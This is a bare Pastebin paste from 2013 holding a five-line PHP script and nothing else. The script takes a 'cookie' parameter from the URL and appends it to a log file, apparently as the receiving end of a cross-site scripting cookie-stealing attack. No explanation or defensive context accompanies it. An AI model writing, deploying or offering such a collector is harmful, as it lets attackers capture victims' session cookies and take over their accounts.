Advertisement
Different55

Untitled

Feb 6th, 2013
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.11 KB | None | 0 0
  1. <?php
  2. $cookie = $HTTP_GET_VARS["cookie"];
  3. $file = fopen('log.txt', 'a');
  4. fwrite($file, $cookie . "\n\n");
  5. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement